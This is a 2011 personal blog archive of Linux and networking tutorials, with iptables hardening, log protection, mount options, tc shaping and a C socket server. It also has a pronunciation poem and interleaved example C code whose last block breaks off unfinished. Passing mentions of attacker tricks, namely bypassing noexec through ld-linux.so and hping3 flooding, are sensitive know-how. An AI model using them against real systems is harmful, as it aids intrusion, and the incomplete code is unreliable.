PoiNtEr->: 2011

                             Difference between a dream and an aim. A dream requires soundless sleep, whereas an aim requires sleepless efforts.


Thursday, December 29, 2011

Understanding ATA,SATA And SCSI

ATA (Advanced Technology Attachment): a 16-bit parallel interface used for controlling computer drives. Introduced in 1986, it has undergone many evolutions in the last 18+ years, with the latest version being called ATA-7. Wherever an item is referred to as an ATA device, it is commonly a Parallel ATA device. ATA devices are also commonly called IDE, EIDE, Ultra-ATA, Ultra-DMA, ATAPI, PATA, etc. (each of these acronyms actually refers to a very specific thing, but they are commonly used interchangeably).

[image: IDE HDD]

SATA (Serial Advanced Technology Attachment): a 1-bit serial evolution of the Parallel ATA physical storage interface.
SATA extends the capabilities of ATA and offers transfer rates starting at 150MB/s; after years of development it has moved into the mainstream of disk interfaces. The successor to the SCSI interface is SAS, at speeds of up to 3Gb/s. Additionally, SATA addresses parallel-interface issues such as drive addressability and the limit on the number of devices per port connection.
[image: SATA]




SCSI
Short for small computer system interface, SCSI is a parallel interface standard used by Apple Macintosh computers, PCs and many UNIX systems for attaching peripheral devices to computers. Nearly all Apple Macintosh computers, excluding only the earliest Macs and the recent iMac, come with a SCSI port for attaching devices such as disk drives and printers. SCSI interfaces provide data transmission rates of up to 80 megabytes per second. In addition, you can attach multiple devices to a single SCSI port, so SCSI is really an I/O bus rather than simply an interface.



Cables & Connectors: Another big advantage of SATA over ATA is the cabling and connectors. The serial interface reduces the number of wires needed to transmit data, making for a much smaller cable and making it easier to route and install SATA devices. The IDE cables used in parallel ATA systems are bulkier than Serial ATA cables and can only extend to 40cm, while Serial ATA cables can extend up to one meter. In addition to the cabling, a new connector design is used that reduces the crosstalk between the wires; the connector design also provides easier routing and better air flow.
[images: 26-inch internal SCSI cable; external SCSI4 cable; SATA internal power splitter cable; Serial ATA drive connection cable]

Monday, December 26, 2011

Controlling Bandwidth in Linux (ubuntu) using Trickle



Trickle is a portable, lightweight userspace bandwidth shaper. It can run in collaborative mode (together with trickled) or in stand-alone mode.
trickle works by taking advantage of the Unix dynamic loader's preloading mechanism. Essentially, it provides the application with a replacement for the functions used to send and receive data through sockets, and then limits traffic by delaying the sending and receiving of data over those sockets. trickle runs entirely in userspace and does not require root privileges.

To install trickle in Ubuntu:


sudo apt-get install trickle


To start Firefox with a limit on the amount of bandwidth it consumes, all you have to do is type the following on the command line:

trickle -d 200 firefox

This starts Firefox with a download limit of 200KB/s.

Traffic Control Using tc in Linux (Ubuntu)



In the absence of infinite bandwidth there will always be a need to hand out capacity according to rules. Traditionally this has been a main reason to add non-IP technology to a network, like ATM or frame relay. Since IP is steadily taking over the world, Linux is well placed to play a role in enabling IP to take over traffic controlling functions from other technologies.


What is a qdisc?
• Queueing Discipline (qdisc): An algorithm that manages the queue of a device, either incoming (ingress) or outgoing (egress).
• Classless qdisc: A qdisc with no configurable internal subdivisions.
• Classful qdisc: A classful qdisc contains multiple classes. Each of these classes contains a further qdisc, which may again be classful, but need not be.

Some Important Available Queueing Disciplines

• pfifo_fast
• Token Bucket Filter (TBF)
• Stochastic Fairness Queueing (SFQ)
• Prio
• CBQ
• Hierarchical Token Bucket (HTB)



Token Bucket (TB) {analogy used in shaping traffic}

A token bucket is nothing but a common algorithm used to control the amount of data that is injected into a network, while still allowing bursts of data to be sent. It is used for network traffic shaping or rate limiting. With a token bucket you can define the maximum rate of traffic allowed on an interface at a given moment in time.

                tokens/sec
                    |
                    v
            +---------------+
            |    bucket     |  holds up to b tokens
            +-------+-------+
                    |
                    v
Packet   +------------+
stream ->| token wait | --> remove token --> eth0
         +------------+

  1. The TB filter puts tokens into the bucket at a certain rate.
  2. Each token is permission for the source to send a specific number of bits into the network.
  3. The bucket can hold b tokens, as set by the shaping rules.
  4. The kernel can send a packet only if a token is available; otherwise the traffic has to wait.
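To make the four steps above concrete, here is an added simulation of the token bucket (example code written for this page, not from the original post or from the tc/TBF sources). It assumes one token per byte, a bucket of b bytes refilled at r bytes per second, and a constructed stream of ten 100-byte packets that all arrive at once.

```c
#include <stdio.h>

/* One token = one byte (an assumption of this example). The bucket holds at
   most `burst` tokens and is refilled at `rate` tokens per second. */
struct token_bucket {
    double rate;    /* step 1: tokens added per second */
    double burst;   /* step 3: capacity b of the bucket */
    double tokens;  /* tokens currently available */
    double last;    /* time (seconds) of the last refill */
};

static void tb_init(struct token_bucket *tb, double rate, double burst) {
    tb->rate = rate;
    tb->burst = burst;
    tb->tokens = burst;   /* a fresh bucket is full, so an initial burst is allowed */
    tb->last = 0.0;
}

/* Steps 1 and 3: add the tokens that accrued since the last refill, never
   letting the bucket overflow its capacity b. */
static void tb_refill(struct token_bucket *tb, double now) {
    if (now > tb->last) {
        tb->tokens += (now - tb->last) * tb->rate;
        if (tb->tokens > tb->burst)
            tb->tokens = tb->burst;
        tb->last = now;
    }
}

/* Steps 2 and 4: a packet of `size` tokens leaves at once if enough tokens are
   in the bucket (returns 0.0); otherwise the return value is how many seconds
   it must wait for the bucket to refill. A packet bigger than b can never
   conform, so -1.0 is returned and nothing is consumed. */
static double tb_send(struct token_bucket *tb, double size, double now) {
    double wait = 0.0;
    if (size > tb->burst)
        return -1.0;
    tb_refill(tb, now);
    if (tb->tokens < size) {
        wait = (size - tb->tokens) / tb->rate;  /* time until `size` tokens exist */
        tb_refill(tb, now + wait);
    }
    tb->tokens -= size;  /* the packet takes its tokens as it is released */
    return wait;
}

/* Pushes `n` packets of `pkt` tokens that all arrive at t=0 through the shaper
   in FIFO order, printing each departure. Returns how many left without
   waiting (the burst); `*last_release`, if given, gets the final departure time. */
static int tb_simulate(double rate, double burst, double pkt, int n, double *last_release) {
    struct token_bucket tb;
    int immediate = 0;
    double t = 0.0;   /* a FIFO shaper cannot release packet i+1 before packet i */
    tb_init(&tb, rate, burst);
    for (int i = 0; i < n; i++) {
        double wait = tb_send(&tb, pkt, t);
        if (wait < 0.0) {
            printf("packet %d: larger than the bucket, never conforms\n", i);
            continue;
        }
        if (wait == 0.0)
            immediate++;
        t += wait;
        printf("packet %d departs at t=%.2fs%s\n", i, t, wait == 0.0 ? " (burst)" : "");
    }
    if (last_release)
        *last_release = t;
    return immediate;
}

/* Departure time of the last packet: after the burst of b/pkt packets, every
   further packet waits pkt/rate seconds, which is the long-run shaping rate. */
static double tb_last_release(double rate, double burst, double pkt, int n) {
    double t = 0.0;
    tb_simulate(rate, burst, pkt, n, &t);
    return t;
}

int main(void) {
    /* constructed stream: 200 tokens/s, bucket of 500, ten 100-byte packets */
    int burst_pkts = tb_simulate(200.0, 500.0, 100.0, 10, NULL);
    printf("%d packets left immediately (b/pkt = 500/100)\n", burst_pkts);
    return 0;
}
```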
tc is used to configure Traffic Control in the Linux kernel. Traffic Control consists of the following:
SHAPING
When traffic is shaped, its rate of transmission is under control. Shaping may be more than lowering the available bandwidth - it is also used to smooth out bursts in traffic for better network behaviour. Shaping occurs on egress.
SCHEDULING
By scheduling the transmission of packets it is possible to improve interactivity for traffic that needs it while still guaranteeing bandwidth to bulk transfers. Reordering is also called prioritizing, and happens only on egress.
POLICING
Where shaping deals with transmission of traffic, policing pertains to traffic arriving. Policing thus occurs on ingress.
DROPPING
Traffic exceeding a set bandwidth may also be dropped forthwith, both on ingress and on egress.
Processing of traffic is controlled by three kinds of objects: qdiscs, classes and filters.



 
Example Problem: We have two customers, A and B, both connected to the internet via eth0. We want to allocate 60 kbps to B and 40 kbps to A. Next we want to subdivide A's bandwidth into 30 kbps for WWW and 10 kbps for everything else. Any unused bandwidth can be used by any class which needs it (in proportion to its allocated share).



tc qdisc add dev eth0 root handle 1: htb default 12

This command attaches the queue discipline HTB to eth0 and gives it the "handle" 1:. This is just a name or identifier with which to refer to it below. The default 12 means that any traffic that is not otherwise classified will be assigned to class 1:12.



tc class add dev eth0 parent 1: classid 1:1 htb rate 100kbps ceil 100kbps 
tc class add dev eth0 parent 1:1 classid 1:10 htb rate 30kbps ceil 100kbps
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 10kbps ceil 100kbps
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 60kbps ceil 100kbps



The first line creates a "root" class, 1:1, under the qdisc 1:. The definition of a root class is one with the htb qdisc as its parent. A root class, like other classes under an htb qdisc, allows its children to borrow from each other, but one root class cannot borrow from another.




We also have to describe which packets belong in which class. This is really not related to the HTB qdisc.


tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 \
   match ip src 1.2.3.4 match ip dport 80 0xffff flowid 1:10
tc filter add dev eth0 protocol ip parent 1:0 prio 1 u32 \
   match ip src 1.2.3.4 flowid 1:11
(We identify A by its IP address, which we imagine here to be 1.2.3.4.)
u32 is a classifier that matches on packet header fields: the first filter matches packets from 1.2.3.4 whose IP destination port is *exactly* 80 (the 0xffff mask covers the whole port number) and sends them to class 1:10; the second matches the remaining packets from 1.2.3.4 and sends them to class 1:11. Everything else falls into the default class 1:12.



Thursday, December 22, 2011

Disable Traceroute(tracert) using iptables

To disable traceroute coming from a Linux box (tested on Ubuntu 11.04), drop the ICMP port-unreachable replies that a UDP-based traceroute relies on:
# iptables -t filter -A OUTPUT -p icmp -m icmp --icmp-type port-unreachable -j DROP

And to disable traceroute coming from a Windows box (tested on Windows 7), drop the echo replies instead, since Windows tracert probes with ICMP echo requests:
# iptables -t filter -A OUTPUT -p icmp -m icmp --icmp-type echo-reply -j DROP

Note that the second rule also stops the box from answering ordinary ping, because that is the same echo-reply.

Tuesday, December 20, 2011

HACKER's Diary 3

Protect Yourself From DDOS and Brute Force Attacks using IPTABLES in linux

The Linux firewall is called iptables. Iptables is very powerful; its features include:
1: Filtering (blocking unwanted traffic). You can filter incoming and outgoing traffic by user, group, time/date, or service (application).
2: NAT (routing). If your computer has two or more network cards (or if you are using virtualization) you can use a spare computer as a router, one network card connected to the Internet and the other to your LAN, with iptables monitoring and filtering traffic.
3: Logging (monitoring) network traffic.
4: Blocking brute force or DoS attacks.




Block Brute Force attempts (SSH or other connections)
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH --rsource
iptables -A INPUT -p tcp --dport 22 -m recent --update --seconds 600 --hitcount 8 --rttl --name SSH --rsource -j DROP
iptables -A INPUT -p tcp --dport 22 -j ACCEPT

The first rule records the source address of every new connection to port 22 in the "SSH" list; the second drops the packet if that address has opened 8 or more new connections within the last 600 seconds; anything else reaches the ACCEPT rule.

DOS ATTACKS:
In a DoS attack the attacker generally tries to flood the victim with a large number of packets (hping3 is a common tool for generating such floods).
The Internet Control Message Protocol (ICMP) has many messages that are identified by a "type" field. The two types that matter here are 0 and 8:
1: Zero (0) is echo-reply
2: Eight (8) is echo-request.

iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP
OR
iptables -A OUTPUT -p icmp --icmp-type 8 -j DROP

Both lines are the same rule, written once with the type name and once with its number; it stops echo requests from leaving this host.

Socket Programming in C



//Simple Hello Server

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>        /* close() */
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>     /* inet_ntoa() */

int main(void)
{
    int sock, cli;
    socklen_t len;
    char mesg[] = "Hello to the World to Socket Programming";
    ssize_t sent;
    struct sockaddr_in server, client;

    //socket: create a TCP (stream) socket
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket");
        exit(-1);
    }
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(9335);
    server.sin_addr.s_addr = INADDR_ANY;   /* listen on every local address */

    //bind: attach the socket to port 9335
    if (bind(sock, (struct sockaddr *)&server, sizeof(server)) == -1)
    {
        perror("bind");
        exit(-1);
    }

    //listen: allow up to 5 pending connections
    if (listen(sock, 5) == -1)
    {
        perror("listen");
        exit(-1);
    }

    //accept: serve one client at a time, send the greeting and close
    while (1)
    {
        len = sizeof(client);   /* must be reset before every accept() */
        if ((cli = accept(sock, (struct sockaddr *)&client, &len)) == -1)
        {
            perror("accept");
            exit(-1);
        }
        sent = send(cli, mesg, strlen(mesg), 0);
        printf("sent %zd bytes to client : %s\n", sent, inet_ntoa(client.sin_addr));
        close(cli);
    }
    return 0;
}

WORDS YOU NEED FOR A GOOD VOCABULARY

English is tough stuff

Dearest creature in creation,
Study English pronunciation.
I will teach you in my verse
Sounds like corpse, corps, horse, and worse.
I will keep you, Suzy, busy,
Make your head with heat grow dizzy.
Tear in eye, your dress will tear.
So shall I! Oh hear my prayer.
Just compare heart, beard, and heard,
Dies and diet, lord and word,
Sword and sward, retain and Britain.
(Mind the latter, how it's written.)
Now I surely will not plague you
With such words as plaque and ague.
But be careful how you speak:
Say break and steak, but bleak and streak;
Cloven, oven, how and low,
Script, receipt, show, poem, and toe.


Hear me say, devoid of trickery,
Daughter, laughter, and Terpsichore,
Typhoid, measles, topsails, aisles,
Exiles, similes, and reviles;
Scholar, vicar, and cigar,
Solar, mica, war and far;
One, anemone, Balmoral,
Kitchen, lichen, laundry, laurel;
Gertrude, German, wind and mind,
Scene, Melpomene, mankind.


Billet does not rhyme with ballet,
Bouquet, wallet, mallet, chalet.
Blood and flood are not like food,
Nor is mould like should and would.
Viscous, viscount, load and broad,
Toward, to forward, to reward.
And your pronunciation's OK
When you correctly say croquet,
Rounded, wounded, grieve and sieve,
Friend and fiend, alive and live.



Ivy, privy, famous; clamour
And enamour rhyme with hammer.
River, rival, tomb, bomb, comb,
Doll and roll and some and home.
Stranger does not rhyme with anger,
Neither does devour with clangour.
Souls but foul, haunt but aunt,
Font, front, wont, want, grand, and grant,
Shoes, goes, does. Now first say finger,
And then singer, ginger, linger,
Real, zeal, mauve, gauze, gouge and gauge,
Marriage, foliage, mirage, and age.


Query does not rhyme with very,
Nor does fury sound like bury.
Dost, lost, post and doth, cloth, loth.
Job, nob, bosom, transom, oath.
Though the differences seem little,
We say actual but victual.
Refer does not rhyme with deafer.
Foeffer does, and zephyr, heifer.
Mint, pint, senate and sedate;
Dull, bull, and George ate late.
Scenic, Arabic, Pacific,
Science, conscience, scientific.


Liberty, library, heave and heaven,
Rachel, ache, moustache, eleven.
We say hallowed, but allowed,
People, leopard, towed, but vowed.
Mark the differences, moreover,
Between mover, cover, clover;
Leeches, breeches, wise, precise,
Chalice, but police and lice;
Camel, constable, unstable,
Principle, disciple, label.


Petal, panel, and canal,
Wait, surprise, plait, promise, pal.
Worm and storm, chaise, chaos, chair,
Senator, spectator, mayor.
Tour, but our and succour, four.
Gas, alas, and Arkansas.
Sea, idea, Korea, area,
Psalm, Maria, but malaria.
Youth, south, southern, cleanse and clean.
Doctrine, turpentine, marine.


Compare alien with Italian,
Dandelion and battalion.
Sally with ally, yea, ye,
Eye, I, ay, aye, whey, and key.
Say aver, but ever, fever,
Neither, leisure, skein, deceiver.
Heron, granary, canary.
Crevice and device and aerie.



Face, but preface, not efface.
Phlegm, phlegmatic, ass, glass, bass.
Large, but target, gin, give, verging,
Ought, out, joust and scour, scourging.
Ear, but earn and wear and tear
Do not rhyme with here but ere.
Seven is right, but so is even,
Hyphen, roughen, nephew Stephen,
Monkey, donkey, Turk and jerk,
Ask, grasp, wasp, and cork and work.


Pronunciation -- think of Psyche!
Is a paling stout and spikey?
Won't it make you lose your wits,
Writing groats and saying grits?
It's a dark abyss or tunnel:
Strewn with stones, stowed, solace, gunwale,
Islington and Isle of Wight,
Housewife, verdict and indict.


Finally, which rhymes with enough --
Though, through, plough, or dough, or cough?
Hiccough has the sound of cup.
My advice is to give up!!!

(Apparently excerpted from The Chaos by Gerard Nolst Trenité.)

REPAIR GRUB2

REPAIR GRUB2 AFTER WINDOWS 7 INSTALLATION

1: sudo -i

2: fdisk -l
output:
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000080

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1           12750       19458    53882881    5  Extended
/dev/sda2              13        7650    61337600    7  HPFS/NTFS
/dev/sda3   *        7651       12749    40957717+   7  HPFS/NTFS
/dev/sda5           12750       19458    53882880   83  Linux

So, as you can see above, Linux is installed on sda5.

3: mount /dev/sda5 /mnt

4: mount /dev/sdaN /mnt/boot            # only if you have a separate /boot partition: replace sdaN with that partition, otherwise skip this step

5: grub-install --root-directory=/mnt/ /dev/sda

6: sudo reboot

Voila, your dead Ubuntu is up!!!



Friday, December 9, 2011

Download an already buffered YouTube video on Ubuntu 11.04

1: file /proc/*/fd/* 2>/dev/null | grep Flash | cut -f1 -d:

output: /proc/12631/fd/17

This is the file descriptor through which the Flash plugin still holds the buffered video open. Now go to this path and that's it, voila, we are done :-)

2: cp $(file /proc/*/fd/* 2>/dev/null | grep Flash | cut -f1 -d: | head -n 1) VideoName.avi

The above command will save the video in your current working directory....

Wednesday, November 23, 2011

Hacker’s Diary “10”

 

Hack 5: Protect Your Logs from Tampering

So welcome, guys, to the second section of hacker's diary. Today we see how we can protect our log files.

By now you must be thinking: why is it important to protect log files?

Well, an attacker will more than likely leave telltale signs of his actions in various logs. This is a very valuable audit trail that should be protected, so that it can help us figure out how the attacker got in, or where the attack came from.

So the big question is: if the attacker gains ROOT privileges, then how do we stop him from removing the traces of his misbehaviour?

One useful attribute for protecting log files is append-only. When this attribute is set, the file cannot be deleted, and writes are only allowed to append to the end of the file.

To set the append-only flag under Linux, run this command:

# chattr +a filename

Obviously, an intruder who has gained root privileges could realize that file attributes are being used and just remove the append-only flag from our logs by running chattr -a. To prevent this, we need to disable the ability to remove the append-only attribute. To accomplish this under Linux, use its capabilities mechanism.


The Linux capabilities model divides up the privileges given to the all-powerful root account and allows you to selectively disable them. In order to prevent a user from removing the append-only attribute from a file, we need to remove the CAP_LINUX_IMMUTABLE capability. When present in the running system, this capability allows the append-only attribute to be modified. To modify the set of capabilities available to the system, we will use a simple utility called lcap (http://packetstormsecurity.org/linux/admin/lcap-0.0.3.tar.bz2).

To unpack and compile the tool, run this command:

# tar xvfj lcap-0.0.3.tar.bz2 && cd lcap-0.0.3 && make

Then, to disallow modification of the append-only flag, run:

# ./lcap CAP_LINUX_IMMUTABLE

# ./lcap CAP_SYS_RAWIO

The first command removes the ability to change the append-only flag, and the second command removes the ability to do raw I/O. This is needed so that the protected files cannot be modified by accessing the block device they reside on. It also prevents access to /dev/mem and /dev/kmem, which would provide a loophole for an intruder to reinstate the CAP_LINUX_IMMUTABLE capability. To remove these capabilities at boot, add the previous two commands to your system startup scripts (e.g., /etc/rc.local). You should ensure that capabilities are removed late in the boot order, to prevent problems with other startup scripts. Once lcap has removed kernel capabilities, they can be reinstated only by rebooting the system.


Note: lcap only works for Linux kernel versions < 2.6. But I am still trying to figure out a way to make it work for newer kernel versions as well. If you have any idea, please share it here.
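A check for the append-only protection described above, as an added example (written for this page, not from the original post or from lcap): it parses the output of lsattr, the command that shows what chattr +a set, and reports every log file that still lacks the 'a' flag. The lsattr listing is constructed for the example; on a real system feed it the output of lsattr /var/log/*.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample of what `lsattr /var/log/*` prints (an assumption for this
   example, not output captured from a real system). The first field holds the
   attribute letters; 'a' is the append-only flag that `chattr +a` sets. */
static const char *kSampleLsattr =
    "-----a-------e-- /var/log/auth.log\n"
    "-----a-------e-- /var/log/syslog\n"
    "-------------e-- /var/log/kern.log\n"
    "-------------e-- /var/log/my app.log\n";

/* Copies the next line of *p (without its newline) into `line` and advances *p.
   Returns 0 once the listing is exhausted. */
static int next_line(const char **p, char *line, size_t sz) {
    const char *nl;
    size_t n;
    if (**p == '\0') return 0;
    nl = strchr(*p, '\n');
    n = nl ? (size_t)(nl - *p) : strlen(*p);
    if (n >= sz) n = sz - 1;
    memcpy(line, *p, n);
    line[n] = '\0';
    *p = nl ? nl + 1 : *p + n;
    return 1;
}

/* Splits one lsattr line into its flag field and its path. Everything after the
   first run of blanks is the path, so file names containing spaces survive.
   Returns 0 on success, -1 if the line is not shaped like lsattr output. */
static int parse_lsattr_line(const char *line, char *flags, size_t flags_sz,
                             char *path, size_t path_sz) {
    const char *sp = strchr(line, ' ');
    size_t flen, plen;
    if (sp == NULL) return -1;
    flen = (size_t)(sp - line);
    if (flen == 0 || flen >= flags_sz) return -1;
    memcpy(flags, line, flen);
    flags[flen] = '\0';
    while (*sp == ' ') sp++;
    plen = strcspn(sp, "\n");
    if (plen == 0 || plen >= path_sz) return -1;
    memcpy(path, sp, plen);
    path[plen] = '\0';
    return 0;
}

/* 1 if the flag field carries 'a': the file can only be appended to and cannot
   be deleted or truncated until someone with CAP_LINUX_IMMUTABLE clears it. */
static int is_append_only(const char *flags) {
    return strchr(flags, 'a') != NULL;
}

/* Walks a whole listing, prints every file still lacking the flag (where the
   admin should run `chattr +a`) and returns how many there were. */
static int count_unprotected(const char *listing) {
    int unprotected = 0;
    const char *p = listing;
    char line[600], flags[64], path[512];
    while (next_line(&p, line, sizeof line)) {
        if (parse_lsattr_line(line, flags, sizeof flags, path, sizeof path) == 0 &&
            !is_append_only(flags)) {
            printf("not append-only: %s (flags %s)\n", path, flags);
            unprotected++;
        }
    }
    return unprotected;
}

/* Status of one file in a listing: 1 append-only, 0 unprotected, -1 not listed. */
static int file_status(const char *listing, const char *wanted) {
    const char *p = listing;
    char line[600], flags[64], path[512];
    while (next_line(&p, line, sizeof line)) {
        if (parse_lsattr_line(line, flags, sizeof flags, path, sizeof path) == 0 &&
            strcmp(path, wanted) == 0)
            return is_append_only(flags);
    }
    return -1;
}

int main(void) {
    int n = count_unprotected(kSampleLsattr);
    printf("%d file(s) still need chattr +a\n", n);
    return 0;
}
```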

Wednesday, November 16, 2011

Memory Representation Of int data type in C Language

In computer science, an integer is a datum of integral data type, a data type which represents some finite subset of the mathematical integers. Integral data types may be of different sizes and may or may not be allowed to contain negative values. An int may be signed or unsigned, and the two have different memory representations. Numbers are represented in binary only, without extra symbols, which requires a method of encoding the minus sign. The four best-known methods of extending the binary numeral system to represent signed numbers are: sign-and-magnitude, ones' complement, two's complement, and excess-K.
1. Memory representation of:

unsigned int a=7;

It is a 16-bit data type (on the 16-bit compilers assumed throughout this post) and all 16 bits are data bits. We are also assuming that our microprocessor uses the little-endian method, so before moving any further, first have a look at endianness.

Memory representation:

[image: the two bytes of a=7 in memory, little-endian: the low byte 00000111 at the lower address and the high byte 00000000 at the next one]

Note: the memory representation of the following will be the same:

unsigned short int a=7;

2. Memory representation of:

int a=7 or signed int a=7;

It is a 16-bit data type:
15 bits: data bits
1 bit: sign bit
The binary equivalent of 7 is 111.
For 16 bits we add 13 zeros on the left side, i.e. 00000000 00000111
Here
A (low byte) is 00000111
B (high byte) is 00000000

Memory representation:

[image: the two bytes in memory, little-endian: A = 00000111 at the lower address, B = 00000000 at the next one]

Note: the memory representation of the following will be the same:

short int a=7 or signed short int a=7;


3. Memory representation of:

int a= -7 or signed int a= -7;

It is a 16-bit data type.
The binary equivalent of 7 is 111.
For 16 bits we add 13 zeros on the left side, i.e. 00000000 00000111
Since a is a negative number, it is first converted into 2's complement format before being stored in memory.

1's complement of a: 11111111 11111000

+ 1

______________________

2's complement of a: 11111111 11111001

Memory representation:

[image: the two bytes in memory, little-endian: 11111001 at the lower address, 11111111 at the next one]

Note: the memory representation of the following will be the same:

short int a=-7 or signed short int a=-7
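The three layouts above, as an added C example (written for this page, not code from the original post): it computes the ones' and two's complement of the 16-bit magnitude by hand, then copies the bytes of a 16-bit int straight out of memory so the host's byte order is visible. int16_t is used so the 16-bit size the post assumes still holds on today's compilers; that, and the little-endian host, are assumptions of the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Renders the 16 bits of v as "hhhhhhhh llllllll", the layout used in the post. */
static const char *bin16(uint16_t v, char buf[18]) {
    for (int i = 0; i < 16; i++)
        buf[i < 8 ? i : i + 1] = (v & (1u << (15 - i))) ? '1' : '0';
    buf[8] = ' ';
    buf[17] = '\0';
    return buf;
}

/* Step "1's complement": flip every one of the 16 bits of the magnitude. */
static uint16_t ones_complement16(uint16_t magnitude) {
    return (uint16_t)~magnitude;
}

/* Step "2's complement": add one to the ones' complement. This is the bit
   pattern the CPU stores for -magnitude. */
static uint16_t twos_complement16(uint16_t magnitude) {
    return (uint16_t)(ones_complement16(magnitude) + 1u);
}

/* Copies the two bytes of a 16-bit int exactly as they sit in memory, so the
   order shows the host's endianness rather than the mathematical value. */
static void short_bytes(int16_t v, unsigned char out[2]) {
    memcpy(out, &v, 2);
}

/* Byte at memory offset `idx` (0 = lowest address) of the 16-bit value v. */
static unsigned char short_byte_at(int16_t v, int idx) {
    unsigned char b[2];
    short_bytes(v, b);
    return b[idx];
}

/* 1 on a little-endian host (low byte at the lower address, as the post assumes). */
static int host_is_little_endian(void) {
    return short_byte_at(0x0001, 0) == 0x01;
}

/* Confirms the two views agree: reading the stored pattern of a negative value
   as unsigned gives exactly the two's complement computed by hand above. */
static int stored_pattern_matches(int16_t negative) {
    uint16_t as_bits;
    memcpy(&as_bits, &negative, 2);
    return as_bits == twos_complement16((uint16_t)(-negative));
}

int main(void) {
    char buf[18];
    unsigned char b[2];
    int16_t vals[] = { 7, -7 };   /* the post's two sample values */
    for (size_t i = 0; i < sizeof vals / sizeof vals[0]; i++) {
        short_bytes(vals[i], b);
        printf("short a = %3d  bits: %s  bytes in memory: %02X %02X (%s-endian)\n",
               vals[i], bin16((uint16_t)vals[i], buf), b[0], b[1],
               host_is_little_endian() ? "little" : "big");
    }
    printf("1's complement of 7: %s\n", bin16(ones_complement16(7), buf));
    printf("2's complement of 7: %s\n", bin16(twos_complement16(7), buf));
    return 0;
}
```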



Tuesday, November 15, 2011

Hacker’s Diary 1

Secure Mount Point

WassUp guys!!... Well, I am studying too many things about network security and operating systems, so I decided to share that with everyone. So the main aim of my hacker's diary series is to tell people ways to remain more secure and surf the internet freely without any fear of getting attacked. And everyone knows what networking is... it's all computers coming together and sharing things... with some sharing... and some stealing.. This is one of my own definitions, but still I don't have any copyright on that.

So let's start with the hard drive. We all know most of our data is stored on our hard drives and it is the primary way of interacting with a Unix (or Windows) machine. So it is desirable to limit what an intruder can access if he gains access to your computer.

So one easy way of doing that is the use of restrictive mount points.

A mount option is a flag that controls how the filesystem may be accessed. It is passed to the operating system kernel's code when the filesystem is brought online. Mount options can be used to prevent files from being interpreted as device nodes, to disallow binaries from being executed, and to disallow the SUID bit from taking effect (by using the nodev, noexec, and nosuid flags). Filesystems can also be mounted read-only with the ro option.

These options are specified from the command line by running mount with the -o flag. For example, if you have a separate partition for /tmp that is on the third partition of your first IDE hard disk, you can mount with the nodev, noexec, and nosuid flags, which are enabled by running the following command:

# mount -o nodev,noexec,nosuid /dev/hda3 /tmp

An equivalent entry in your /etc/fstab would look something like this:

/dev/hda3 /tmp ext3 defaults,nodev,noexec,nosuid 1 2

There are a number of ways that an attacker can still circumvent these mount restrictions. For example, the noexec option on Linux can be bypassed by using /lib/ld-linux.so to execute binaries residing on such filesystems. At first glance, you'd think that this can be remedied by making ld-linux.so nonexecutable, but this would render all dynamically linked binaries unexecutable. So, unless all of the programs you rely on are statically linked (they're probably not), the noexec option is of little use in Linux. In addition, an attacker who has already gained root privileges will not be significantly hampered by filesystems mounted with special options, since these can often be remounted with the -o remount option. But by using mount flags, you can easily limit the possible attacks available to a hostile user before he gains root privileges.
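An audit of the options discussed above, as an added example (written for this page, not part of the original post): it reads an fstab-format listing with the C library's getmntent() and hasmntopt() and reports which of nodev, noexec and nosuid each mount point is missing. The fstab text is constructed for the example; the comment in main says what to swap in to audit the live system instead.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <mntent.h>

/* Constructed fstab text for the audit (an assumption for this example, not a
   real system's file). /tmp follows the post's recommendation; /home and / do not. */
static const char *kConstructedFstab =
    "/dev/hda1 /     ext3 defaults                      1 1\n"
    "/dev/hda3 /tmp  ext3 defaults,nodev,noexec,nosuid  1 2\n"
    "/dev/hda4 /home ext3 defaults,nodev                1 2\n"
    "proc      /proc proc defaults                      0 0\n";

/* The three mount options the post recommends for partitions users can write to. */
static const char *kHardeningOpts[] = { "nodev", "noexec", "nosuid" };

/* Counts how many of the hardening options `ent` lacks and lists their names,
   space separated, in `missing`. hasmntopt() matches whole option tokens, so
   "nodev" is never mistaken for part of another option. */
static int missing_options(const struct mntent *ent, char *missing, size_t n) {
    int count = 0;
    missing[0] = '\0';
    for (size_t i = 0; i < sizeof kHardeningOpts / sizeof kHardeningOpts[0]; i++) {
        if (hasmntopt(ent, kHardeningOpts[i]) == NULL) {
            if (count > 0)
                strncat(missing, " ", n - strlen(missing) - 1);
            strncat(missing, kHardeningOpts[i], n - strlen(missing) - 1);
            count++;
        }
    }
    return count;
}

/* Parses fstab-format text with getmntent() (the same parser mount uses) and
   audits the entry for `mountpoint`. Returns the number of missing options,
   or -1 if the mount point is not listed at all. */
static int audit_mountpoint(const char *fstab_text, const char *mountpoint,
                            char *missing, size_t n) {
    int result = -1;
    struct mntent *ent;
    FILE *fp = fmemopen((void *)fstab_text, strlen(fstab_text), "r");
    if (fp == NULL)
        return -1;
    while ((ent = getmntent(fp)) != NULL) {
        if (strcmp(ent->mnt_dir, mountpoint) == 0) {
            result = missing_options(ent, missing, n);
            break;
        }
    }
    fclose(fp);
    return result;
}

/* Convenience wrapper that returns only the count of missing options. */
static int missing_count(const char *fstab_text, const char *mountpoint) {
    char missing[64];
    return audit_mountpoint(fstab_text, mountpoint, missing, sizeof missing);
}

int main(void) {
    const char *check[] = { "/", "/tmp", "/home" };
    for (size_t i = 0; i < sizeof check / sizeof check[0]; i++) {
        char missing[64];
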